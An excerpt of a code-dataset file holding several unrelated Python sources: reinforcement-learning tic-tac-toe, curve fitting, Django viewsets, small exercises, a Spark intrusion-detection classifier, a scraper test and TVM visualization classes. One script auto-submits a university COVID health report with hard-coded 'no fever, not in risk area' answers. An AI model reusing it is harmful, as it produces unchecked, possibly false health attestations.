list(range(self.BOARD_SIZE ** 2)) # Reset legal moves\n return np.concatenate((self.board.flatten(), np.array(get_legal_moves(self.board))))\n\n def render(self, mode='human'):\n print(self.board)\n\n def is_game_over(self):\n # 
check if rows are complete\n # returns if game is over and if it ended in a tie\n for i in range(self.BOARD_SIZE):\n if abs(sum(self.board[i])) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(self.board[i])))\n return True, 0\n\n # check cols\n for i in range(self.BOARD_SIZE):\n if abs(sum(self.board[:, i])) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(self.board[:, i])))\n return True, 0\n\n # check negative diagonal\n if abs(sum(np.diagonal(self.board))) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(np.diagonal(self.board))))\n return True, 0\n\n # check positive diagonal\n if abs(sum(np.diagonal(np.fliplr(self.board)))) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(np.diagonal(np.fliplr(self.board)))))\n return True, 0\n\n # check if draw\n if not self.legal_moves:\n self.winner = 0\n return True, 1\n\n return False, 0\n\n def get_reward(self, done: bool, tie: bool) -> int:\n if done:\n if tie:\n return self.TIE_REWARD\n elif self.winner == 1:\n return self.WIN_REWARD\n else:\n return self.LOSE_REWARD\n else:\n return self.MOVE\n\n\nif __name__ == '__main__':\n # load the model\n trained_model = PPO.load(\"tictactoe_model_3x3_PPO\")\n for _ in range(5):\n env = LearningTicTacToe(trained_model)\n model = PPO('MlpPolicy', env, verbose=1)\n model.learn(total_timesteps=10_000)\n trained_model = model\n\n # save the model\n trained_model.save(\"adversarial_tictactoe_model_3x3_PPO\")\n\n","repo_name":"nicholasg1997/Projects","sub_path":"TicTacToe_AI/TicTacToe_v2.py","file_name":"TicTacToe_v2.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12082689024","text":"import math\nimport numpy as np\nimport pylab\n\n\ndef func(x):\n return math.sin(x / 5) * math.exp(x / 10) + 5 * math.exp(-x / 2)\n\n# Plot the graph\nxmin = 1.0\nxmax = 15.0\ndx = 0.01\nxlist = np.arange(xmin, xmax, dx)\nylist = [func(x) for x in xlist]\npylab.plot(xlist, ylist)\n# The original curve is blue\n\n# 2 points\nA = np.array([[1, 1], [1, 15]])\nb = np.array([func(1), func(15)])\nxres = np.linalg.solve(A, b)\nyres = [(xres[0]+xres[1]*x) for x in xlist]\npylab.plot(xlist, yres)\n# Orange curve\n# Approximates poorly\n\n# 3 points\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nb = np.array([func(1), func(8), func(15)])\nxres = np.linalg.solve(A, b)\nyres = [(xres[0]+xres[1]*x+xres[2]*x*x) for x in xlist]\npylab.plot(xlist, yres)\n# Green curve\n# Approximates poorly, but better than the previous one\n\n# 4 points\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225, 3375]])\nb = np.array([func(1), func(4), func(10), func(15)])\nxres = np.linalg.solve(A, b)\nprint(xres)\nyres = [(xres[0]+xres[1]*x+xres[2]*x*x+xres[3]*x*x*x) for x in xlist]\npylab.plot(xlist, yres)\n# Red curve\n# Approximates well\npylab.show()\n","repo_name":"zhizhin-ik/4semestr","sub_path":"laboratory_17/task_17.3.py","file_name":"task_17.3.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73012898871","text":"# -*- coding: UTF-8 -*-\nimport time\nimport requests\n\nurl = \"https://app.ucas.ac.cn/ucasncov/api/default/save\" # school reporting endpoint\ntoken = \"\" # pushplus token\ntitle= 'Daily COVID report result' # change this to whatever title you want\nmes_url=\"http://www.pushplus.plus/customer/push/send\"# pushplus push URL, no need to change\ncookies = {\n \"eai-sess\": \"\",\n \"UUkey\": \"\"\n}\n\ndata = {\n \"realname\": \"\", # name\n
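 # note: the keys below mirror this form's field names; blank strings are placeholders for the user to fill in\n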
\"\", # 学号\n \"date\": time.strftime(\"%Y-%m-%d\", time.localtime()),\n \"jzdz\":\"北京市怀柔区雁栖湖\",# 在京地址\n \"zrzsdd\":\"1\",# 昨日住宿地点\n \"sfzx\": \"1\", # 是否在校\n \"szgj\": \"中国\", # 所在国家\n \"szdd\": \"国内\", # 所在地点\n \"dqszdd\":\"1\", #当前所在地点\n \"geo_api_info\": \"{\\\"address\\\":\\\"北京市怀柔区\\\",\\\"details\\\":\\\"中国科学院大学雁栖湖校区)\\\",\\\"province\\\":{\\\"label\\\":\\\"北京市\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"海淀区\\\",\\\"value\\\":\\\"\\\"}}\",\n \"szgj_api_info\": \"{\\\"area\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"address\\\":\\\"\\\",\\\"country\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"details\\\":\\\"\\\",\\\"province\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"}}\",\n \"created\":\"1663549596\", # 不明信息\n \"dqsfzzgfxdq\":\"4\", #当前是否在中高风险地区\n \"zgfxljs\":\"4\", # 中高风险旅居史\n \"tw\": \"1\", # 体温选项序号\n \"sffrzz\":\"0\", #是否发热\n \"dqqk1\":\"1\", #当前情况\n \"dqqk2\":\"1\", #当前情况2(健康宝\n \"sfjshsjc\":\"1\", #是否接受核酸检测\n \"old_szdd\": \"国内\",\n \"old_city\": \"{\\\"address\\\":\\\"北京市怀柔区\\\",\\\"details\\\":\\\"中国科学院大学雁栖湖校区)\\\",\\\"province\\\":{\\\"label\\\":\\\"北京市\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"海淀区\\\",\\\"value\\\":\\\"\\\"}}\",\n \"geo_api_infot\": \"{\\\"address\\\":\\\"\\\",\\\"details\\\":\\\"\\\",\\\"country\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"province\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"}}\",\n \"app_id\": \"ucas\",\n}\n\nresult = requests.post(url=url, data=data,cookies=cookies)\n\nif mes_url:\n if result.text[5] == \"0\":\n content=\"填报成功!感谢使用\"\n elif result.text[5] == \"1\":\n content=\"今天已经填报过了哦!\"\n else:\n content=\"总觉得哪里不对,快去看看吧\"\n url = 'http://www.pushplus.plus/send?token='+token+'&title='+title+'&content='+content\n requests.get(url)\n print(\"运行结束\")\n\n\n\n","repo_name":"Edward-lyz/UCAS-checkhelper","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"23559813431","text":"from rest_framework import viewsets\nfrom xadmin_api.custom import XadminViewSet\nfrom users.models import UserProfile, EmailVerifyRecord, Banner\nfrom courses.models import Course, Lesson, Video, CourseResource\nfrom operation.models import UserAsk, CourseComments, UserFavorite, UserMessage, UserCourse\nfrom organization.models import CityDict, CourseOrg, Teacher\n\nfrom xadmin_api.auto_serializers import UserProfileSerializer, EmailVerifyRecordSerializer, BannerSerializer, CourseSerializer, LessonSerializer, \\\n VideoSerializer, CourseResourceSerializer, UserAskSerializer, CourseCommentsSerializer, UserFavoriteSerializer, UserMessageSerializer, \\\n UserCourseSerializer, CityDictSerializer, CourseOrgSerializer, TeacherSerializer\nfrom xadmin_api.auto_filters import UserProfileFilter, EmailVerifyRecordFilter, BannerFilter, CourseFilter, LessonFilter, VideoFilter, \\\n CourseResourceFilter, UserAskFilter, CourseCommentsFilter, UserFavoriteFilter, UserMessageFilter, UserCourseFilter, CityDictFilter, \\\n CourseOrgFilter, TeacherFilter\n\n\nclass UserProfileViewSet(XadminViewSet):\n serializer_class = UserProfileSerializer\n queryset = 
UserProfile.objects.all()\n filter_class = UserProfileFilter\n search_fields = [\"password\", \"username\", \"first_name\", \"last_name\", \"email\", \"nick_name\", \"gender\", \"address\", \"mobile\"]\n\n\nclass EmailVerifyRecordViewSet(XadminViewSet):\n serializer_class = EmailVerifyRecordSerializer\n queryset = EmailVerifyRecord.objects.all()\n filter_class = EmailVerifyRecordFilter\n search_fields = [\"code\", \"email\", \"send_type\"]\n\n\nclass BannerViewSet(XadminViewSet):\n serializer_class = BannerSerializer\n queryset = Banner.objects.all()\n filter_class = BannerFilter\n search_fields = [\"title\", \"url\"]\n\n\nclass CourseViewSet(XadminViewSet):\n serializer_class = CourseSerializer\n queryset = Course.objects.all()\n filter_class = CourseFilter\n search_fields = [\"name\", \"degree\", \"you_need_know\", \"teacher_tell\", \"category\", \"tag\"]\n\n\nclass LessonViewSet(XadminViewSet):\n serializer_class = LessonSerializer\n queryset = Lesson.objects.all()\n filter_class = LessonFilter\n search_fields = [\"name\"]\n\n\nclass VideoViewSet(XadminViewSet):\n serializer_class = VideoSerializer\n queryset = Video.objects.all()\n filter_class = VideoFilter\n search_fields = [\"url\", \"name\"]\n\n\nclass CourseResourceViewSet(XadminViewSet):\n serializer_class = CourseResourceSerializer\n queryset = CourseResource.objects.all()\n filter_class = CourseResourceFilter\n search_fields = [\"name\"]\n\n\nclass UserAskViewSet(XadminViewSet):\n serializer_class = UserAskSerializer\n queryset = UserAsk.objects.all()\n filter_class = UserAskFilter\n search_fields = [\"name\", \"mobile\", \"course_name\"]\n\n\nclass CourseCommentsViewSet(XadminViewSet):\n serializer_class = CourseCommentsSerializer\n queryset = CourseComments.objects.all()\n filter_class = CourseCommentsFilter\n search_fields = [\"comments\"]\n\n\nclass UserFavoriteViewSet(XadminViewSet):\n serializer_class = UserFavoriteSerializer\n queryset = UserFavorite.objects.all()\n filter_class = UserFavoriteFilter\n search_fields = []\n\n\nclass UserMessageViewSet(XadminViewSet):\n serializer_class = UserMessageSerializer\n queryset = UserMessage.objects.all()\n filter_class = UserMessageFilter\n search_fields = [\"message\"]\n\n\nclass UserCourseViewSet(XadminViewSet):\n serializer_class = UserCourseSerializer\n queryset = UserCourse.objects.all()\n filter_class = UserCourseFilter\n search_fields = []\n\n\nclass CityDictViewSet(XadminViewSet):\n serializer_class = CityDictSerializer\n queryset = CityDict.objects.all()\n filter_class = CityDictFilter\n search_fields = [\"name\", \"desc\"]\n\n\nclass CourseOrgViewSet(XadminViewSet):\n serializer_class = CourseOrgSerializer\n queryset = CourseOrg.objects.all()\n filter_class = CourseOrgFilter\n search_fields = [\"name\", \"category\", \"tag\", \"address\"]\n\n\nclass TeacherViewSet(XadminViewSet):\n serializer_class = TeacherSerializer\n queryset = Teacher.objects.all()\n filter_class = TeacherFilter\n search_fields = [\"name\", \"work_company\", \"work_position\", \"points\"]\n","repo_name":"imfht/djangoapps","sub_path":"OnlineMooc-master/xadmin_api/auto_views.py","file_name":"auto_views.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"26059364173","text":"class BST:\n def __init__(self):\n self.root = None\n def setRoot(self,node):\n self.root = node\n def insert(self, data):\n if self.root == None:\n self.root = Node(data)\n elif self.root != None:\n p=self.root\n 
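# walk down from the root until a free child slot is found, then attach the new node\n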
while(p!=None):\n if data >= p.data:\n if p.right == None:\n p.right = Node(data)\n break\n p=p.right\n\n elif data < p.data:\n if p.left == None:\n p.left = Node(data)\n break\n p=p.left\n \n def printTree(self, node, level = 0):\n if node != None:\n self.printTree(node.right, level + 1)\n print(' ' * level, node)\n self.printTree(node.left, level + 1)\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \n def __str__(self):\n return str(self.data)\n\ndef closestValue(root,value):\n if root == None:\n return\n closestValue(root.left,value)\n newLis.append(root.data)\n closestValue(root.right,value)\n\n for i in range(len(newLis)):\n if value <= newLis[0]:\n return newLis[0]\n elif i+1 < len(newLis) and newLis[i] < value and newLis[i+1] >= value:\n return newLis[i+1]\n elif i+1 == len(newLis):\n return newLis[len(newLis)-1]\n \n\ninp,val=input('Enter Input : ').split('/')\ninpLis = [int(e) for e in inp.split()]\nnewLis=[]\nT = BST()\nfor data in inpLis:\n T.insert(data)\n T.printTree(T.root)\n print('--------------------------------------------------')\nans=closestValue(T.root,int(val))\nprint('Closest value of {0} : '.format(str(val))+str(ans))\n","repo_name":"SroLyQ/DataStructCode","sub_path":"Lab08-AVLTree/02-ClosestValue.py","file_name":"02-ClosestValue.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"10867833963","text":"'''\nGiven an array of strings, return another array containing all of its longest strings.\n\nExample\n\nFor inputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"], the output should be\nallLongestStrings(inputArray) = [\"aba\", \"vcd\", \"aba\"].\n'''\n\n\ndef allLongestStrings(arr):\n max_len = 0\n output = []\n\n for chars in arr:\n max_len = max(len(chars), max_len)\n\n for char in arr:\n if len(char) == max_len:\n output.append(char)\n\n return output\n\n\ndef longestStringsListComp(arr):\n max_len = max(len(string) for string in arr)\n output = [string for string in arr if len(string) == max_len]\n return output\n\n\ninputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"]\n\nprint(allLongestStrings(inputArray))\n","repo_name":"rjcrter11/leetChallenges","sub_path":"arrays/all_longest_strings.py","file_name":"all_longest_strings.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37804493288","text":"import pandas as pd\nimport findspark\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoder, VectorAssembler\nfrom pyspark.sql.functions import col,isnan, when, count\nfrom pyspark.ml.classification import DecisionTreeClassifier, LogisticRegression, RandomForestClassifier\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\n\nfrom sklearn.metrics import accuracy_score, f1_score,precision_score, recall_score\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\n\nfindspark.init()\nsc = pyspark.SparkContext\nspark = SparkSession.builder.master(\"local[1]\").appName(\"assignment\").getOrCreate()\n\n# reading the data\ndata_desc = pd.read_csv('UNSW-NB15_features.csv', encoding = \"ISO-8859-1\")\ncols = data_desc['Name'].to_list()\ndata_types = data_desc['Type '].to_list()\ndata_types = list(map(str.lower,data_types))\n\ndata = 
spark.read.option(\"header\",False).csv(\"UNSW-NB15.csv\")\n\n\nfor old,new, dtype in zip(data.columns, cols, data_types):\n data = data.withColumnRenamed(old, new)\n if dtype == \"nominal\":\n pass\n if dtype == \"integer\":\n data = data.withColumn(new,data[new].cast('integer'))\n if dtype == \"float\":\n data = data.withColumn(new,data[new].cast('float'))\n if dtype == \"binary\":\n data = data.withColumn(new,data[new].cast('integer'))\n if dtype == \"timestamp\":\n data = data.withColumn(new,data[new].cast('timestamp'))\n\n\n#dropping columns/features that are not required\ndata = data.drop('srcip', 'dstip', 'sport','dsport', 'Stime','Ltime')\n\n#fixing the attack category rows for fuzzers and reconnaissance\ndata = data.withColumn('attack_cat', when(data['attack_cat'] == 'Fuzzers ', 'Fuzzers').otherwise(data['attack_cat']))\ndata = data.withColumn('attack_cat', when(data['attack_cat'] == 'Reconnaissance ', 'Reconnaissance').otherwise(data['attack_cat']))\ndata = data.na.fill('Normal', subset=['attack_cat'])\n\n#dropping duplicate data\ndata = data.drop_duplicates()\n\ndata = data.dropna(how='any')\nprint(data.columns)\n\nstring_cols = ['proto', 'state', 'service', 'attack_cat']\nindexed_cols = [col+'_index' for col in string_cols]\nindexer = StringIndexer(inputCols=string_cols, outputCols=indexed_cols)\nindexed = indexer.fit(data).transform(data)\nstring_cols.remove('attack_cat')\nindexed_cols.remove('attack_cat_index')\nattack_cat_index = indexed.select('attack_cat_index')\nindexed = indexed.drop('attack_cat_index', 'attack_cat')\nencoded_cols = [col+'_encoded' for col in indexed_cols]\nencoder = OneHotEncoder(inputCols=indexed_cols, outputCols=encoded_cols)\nencoded = encoder.fit(indexed).transform(indexed)\n\ncols_to_remove = string_cols + indexed_cols\nfeature_cols = encoded.columns\nfor col in cols_to_remove:\n feature_cols.remove(col)\n\nfeature_cols.remove('Label')\nassembler = VectorAssembler(inputCols=feature_cols,outputCol=\"features\")\noutput = assembler.transform(encoded)\n\n# Split the data into training and test sets\n(trainingData, testData) = output.randomSplit([0.7, 0.3],seed=555)\n\n# Train a DecisionTree model.\ndt = DecisionTreeClassifier(labelCol=\"Label\", featuresCol=\"features\")\n\nprint(\"Decision tree Training started \")\ndt_model = dt.fit(trainingData)\nprint(\"Training ended\")\n\n# Make predictions.\nprint(\"testing started\")\ndt_predictions = dt_model.transform(testData)\nprint(\"testing ended\")\n\ndt_pandas = dt_predictions.toPandas()\ndt_acc = accuracy_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_rec = recall_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_prec = precision_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_f1 = f1_score(dt_pandas['Label'],dt_pandas['prediction'])\n\n# Select (prediction, true label) and compute test error\nevaluator = BinaryClassificationEvaluator(labelCol=\"Label\")\ndt_roc = evaluator.evaluate(dt_predictions)\n\n\n\nlr = LogisticRegression(featuresCol = 'features', labelCol = 'Label', maxIter=10)\nprint(\"Logistic regression traing started\")\nlrModel = lr.fit(trainingData)\nprint(\"training ended\")\nlr_predictions = lrModel.transform(testData)\n\nlr_pandas = lr_predictions.toPandas()\nlr_acc = accuracy_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_rec = recall_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_prec = precision_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_f1 = f1_score(lr_pandas['Label'],lr_pandas['prediction'])\nevaluator = 
BinaryClassificationEvaluator(labelCol=\"Label\")\nlr_roc = evaluator.evaluate(lr_predictions)\n\n\nrf = RandomForestClassifier(featuresCol= 'features', labelCol='Label')\nprint(\"Random forest model training started\")\nrf_model = rf.fit(trainingData)\nprint(\"training complete\")\nrf_predictions = rf_model.transform(testData)\n\nrf_pandas = rf_predictions.toPandas()\nrf_acc = accuracy_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_rec = recall_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_prec = precision_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_f1 = f1_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_roc = evaluator.evaluate(rf_predictions)\n\n\nprint(\"-------------------------RESULTS-------------------------\")\nprint(\"Decision tree\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", dt_acc)\nprint(\"Recall\", dt_rec)\nprint(\"Precision\", dt_prec)\nprint(\"F1 Score\", dt_f1)\nprint(\"ROC\", dt_roc)\nprint(\"----------------------------------------------------------\")\n\nprint(\"Logistic regression\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", lr_acc)\nprint(\"Recall\", lr_rec)\nprint(\"Precision\", lr_prec)\nprint(\"F1 score\", lr_f1)\nprint(\"ROC\", lr_roc)\nprint(\"----------------------------------------------------------\")\n\nprint(\"Random Forest\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", rf_acc)\nprint(\"Recall\", rf_rec)\nprint(\"Precision\", rf_prec)\nprint(\"F1 score\", rf_f1)\nprint(\"ROC\", rf_roc)\nprint(\"----------------------------------------------------------\")\n\n'''\n\nlr_predictions = lrModel.transform(testData)\n\ntrainingSummary = lrModel.summary\nroc = trainingSummary.roc.toPandas()\nplt.plot(roc['FPR'],roc['TPR'])\nplt.ylabel('False Positive Rate')\nplt.xlabel('True Positive Rate')\nplt.title('ROC Curve')\nplt.show()\nprint('Training set areaUnderROC: ' + str(trainingSummary.areaUnderROC))\n'''\n'''\ntreeModel = dt_model.stages[2]\n# summary only\nprint(treeModel)\n'''\n#https://towardsdatascience.com/machine-learning-with-pyspark-and-mllib-solving-a-binary-classification-problem-96396065d2aa","repo_name":"timothymadegwa/big_data","sub_path":"binary_classifier.py","file_name":"binary_classifier.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41751156316","text":"import pytest as pytest\nfrom bs4 import BeautifulSoup\n\nimport scrape\n\n\ndef test_soup():\n with open(\"petition_example.html\", mode=\"rb\") as file:\n html_binary_list = file.readlines()\n html_strings_list = [html_bin.decode(\"utf-8\") for html_bin in html_binary_list]\n html_text = \"\\n\".join(html_strings_list)\n soup = BeautifulSoup(html_text, \"html.parser\")\n\n h1 = soup.find(\"h1\")\n assert h1.text == \"\"\"Protect the Environment – support carbon neutral energy alternatives\"\"\"\n\n\n@pytest.fixture\ndef soup():\n with open(\"petition_example.html\", mode=\"rb\") as file:\n html_binary_list = file.readlines()\n html_strings_list = [html_bin.decode(\"utf-8\") for html_bin in html_binary_list]\n html_text = \"\\n\".join(html_strings_list)\n return BeautifulSoup(html_text, \"html.parser\")\n\n\ndef test_get_petition_name(soup: BeautifulSoup):\n assert scrape.get_petition_name(soup) == \"\"\"Protect the Environment – support carbon neutral energy 
alternatives\"\"\"\n\n","repo_name":"taraskuzyk/british_parliament_scrape","sub_path":"test_scrape.py","file_name":"test_scrape.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20946080363","text":"import abc\nfrom typing import (\n Dict,\n Union,\n Tuple,\n List,\n)\n\nimport tvm\nfrom tvm import relay\n\nUNKNOWN_TYPE = \"unknown\"\n\n\nclass VizNode:\n \"\"\"VizNode carry node information for `VizGraph` interface.\n\n Parameters\n ----------\n node_id: str\n Unique identifier for this node.\n node_type: str\n Type of this node.\n node_detail: str\n Any supplement for this node such as attributes.\n \"\"\"\n\n def __init__(self, node_id: str, node_type: str, node_detail: str):\n self._id = node_id\n self._type = node_type\n self._detail = node_detail\n\n @property\n def identity(self) -> str:\n return self._id\n\n @property\n def type_name(self) -> str:\n return self._type\n\n @property\n def detail(self) -> str:\n return self._detail\n\n def __repr__(self) -> str:\n detail = self._detail.replace(\"\\n\", \", \")\n return f\"VizNode(identity: {self._id}, type_name: {self._type}, detail: {detail}\"\n\n\nclass VizEdge:\n \"\"\"VizEdge connect two `VizNode`.\n\n Parameters\n ----------\n start_node: str\n The identifier of the node starting the edge.\n end_node: str\n The identifier of the node ending the edge.\n \"\"\"\n\n def __init__(self, start_node: str, end_node: str):\n self._start_node = start_node\n self._end_node = end_node\n\n @property\n def start(self) -> str:\n return self._start_node\n\n @property\n def end(self) -> str:\n return self._end_node\n\n\nclass VizParser(abc.ABC):\n \"\"\"VizParser parses out a VizNode and VizEdges from a `relay.Expr`.\"\"\"\n\n @abc.abstractmethod\n def get_node_edges(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Get VizNode and VizEdges for a `relay.Expr`.\n\n Parameters\n ----------\n node : relay.Expr\n relay.Expr which will be parsed and generate a node and edges.\n\n relay_param: Dict[str, tvm.runtime.NDArray]\n relay parameters dictionary.\n\n node_to_id : Dict[relay.Expr, str]\n This is a mapping from relay.Expr to a unique id, generated by `RelayVisualizer`.\n\n Returns\n -------\n rv1 : Union[VizNode, None]\n VizNode represent the relay.Expr. 
If the relay.Expr is not intended to introduce a node\n to the graph, return None.\n\n rv2 : List[VizEdge]\n a list of VizEdges to describe the connectivity of the relay.Expr.\n Can be empty list to indicate no connectivity.\n \"\"\"\n\n\nclass VizGraph(abc.ABC):\n \"\"\"Abstract class for graph, which is composed of nodes and edges.\"\"\"\n\n @abc.abstractmethod\n def node(self, viz_node: VizNode) -> None:\n \"\"\"Add a node to the underlying graph.\n Nodes in a Relay IR Module are expected to be added in the post-order.\n\n Parameters\n ----------\n viz_node : VizNode\n A `VizNode` instance.\n \"\"\"\n\n @abc.abstractmethod\n def edge(self, viz_edge: VizEdge) -> None:\n \"\"\"Add an edge to the underlying graph.\n\n Parameters\n ----------\n viz_edge : VizEdge\n A `VizEdge` instance.\n \"\"\"\n\n\nclass DefaultVizParser(VizParser):\n \"\"\"DefaultVizParser provde a set of logics to parse a various relay types.\n These logics are inspired and heavily based on\n `visualize` function in https://tvm.apache.org/2020/07/14/bert-pytorch-tvm\n \"\"\"\n\n def get_node_edges(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n if isinstance(node, relay.Function):\n return self._function(node, node_to_id)\n if isinstance(node, relay.expr.Call):\n return self._call(node, node_to_id)\n if isinstance(node, relay.expr.Var):\n return self._var(node, relay_param, node_to_id)\n if isinstance(node, relay.expr.Tuple):\n return self._tuple(node, node_to_id)\n if isinstance(node, relay.expr.TupleGetItem):\n return self._tuple_get_item(node, node_to_id)\n if isinstance(node, relay.expr.Constant):\n return self._constant(node, node_to_id)\n # GlobalVar possibly mean another global relay function,\n # which is expected to in \"Graph\" level, not in \"Node\" level.\n if isinstance(node, (relay.expr.GlobalVar, tvm.ir.Op)):\n return None, []\n\n viz_node = VizNode(node_to_id[node], UNKNOWN_TYPE, f\"don't know how to parse {type(node)}\")\n viz_edges = []\n return viz_node, viz_edges\n\n def _var(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay var node\"\"\"\n\n node_id = node_to_id[node]\n name_hint = node.name_hint\n node_detail = f\"name_hint: {name_hint}\"\n node_type = \"Var(Param)\" if name_hint in relay_param else \"Var(Input)\"\n\n if node.type_annotation is not None:\n if hasattr(node.type_annotation, \"shape\"):\n shape = tuple(map(int, node.type_annotation.shape))\n dtype = node.type_annotation.dtype\n node_detail = f\"{node_detail}\\nshape: {shape}\\ndtype: {dtype}\"\n else:\n node_detail = f\"{node_detail}\\ntype_annotation: {node.type_annotation}\"\n\n # only node\n viz_node = VizNode(node_id, node_type, node_detail)\n viz_edges = []\n return viz_node, viz_edges\n\n def _function(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay function node\"\"\"\n node_details = []\n name = \"\"\n func_attrs = node.attrs\n if func_attrs:\n node_details = [f\"{k}: {func_attrs.get_str(k)}\" for k in func_attrs.keys()]\n # \"Composite\" might from relay.transform.MergeComposite\n if \"Composite\" in func_attrs.keys():\n name = func_attrs[\"Composite\"]\n node_id = node_to_id[node]\n\n # Body -> FunctionNode\n viz_node = VizNode(node_id, f\"Func {name}\", 
\"\\n\".join(node_details))\n viz_edges = [VizEdge(node_to_id[node.body], node_id)]\n return viz_node, viz_edges\n\n def _call(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay call node\"\"\"\n node_id = node_to_id[node]\n op_name = UNKNOWN_TYPE\n node_detail = []\n if isinstance(node.op, tvm.ir.Op):\n op_name = node.op.name\n if node.attrs:\n node_detail = [f\"{k}: {node.attrs.get_str(k)}\" for k in node.attrs.keys()]\n elif isinstance(node.op, relay.Function):\n func_attrs = node.op.attrs\n op_name = \"Anonymous Func\"\n if func_attrs:\n node_detail = [f\"{k}: {func_attrs.get_str(k)}\" for k in func_attrs.keys()]\n # \"Composite\" might from relay.transform.MergeComposite\n if \"Composite\" in func_attrs.keys():\n op_name = func_attrs[\"Composite\"]\n elif isinstance(node.op, relay.GlobalVar):\n op_name = \"GlobalVar\"\n node_detail = [f\"GlobalVar.name_hint: {node.op.name_hint}\"]\n else:\n op_name = str(type(node.op)).split(\".\")[-1].split(\"'\")[0]\n\n # Arguments -> CallNode\n viz_node = VizNode(node_id, f\"Call {op_name}\", \"\\n\".join(node_detail))\n args = [node_to_id[arg] for arg in node.args]\n viz_edges = [VizEdge(arg, node_id) for arg in args]\n return viz_node, viz_edges\n\n def _tuple(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n\n # Fields -> TupleNode\n viz_node = VizNode(node_id, \"Tuple\", \"\")\n viz_edges = [VizEdge(node_to_id[field], node_id) for field in node.fields]\n return viz_node, viz_edges\n\n def _tuple_get_item(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n\n # Tuple -> TupleGetItemNode\n viz_node = VizNode(node_id, \"TupleGetItem\", f\"idx: {node.index}\")\n viz_edges = [VizEdge(node_to_id[node.tuple_value], node_id)]\n return viz_node, viz_edges\n\n def _constant(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n node_detail = 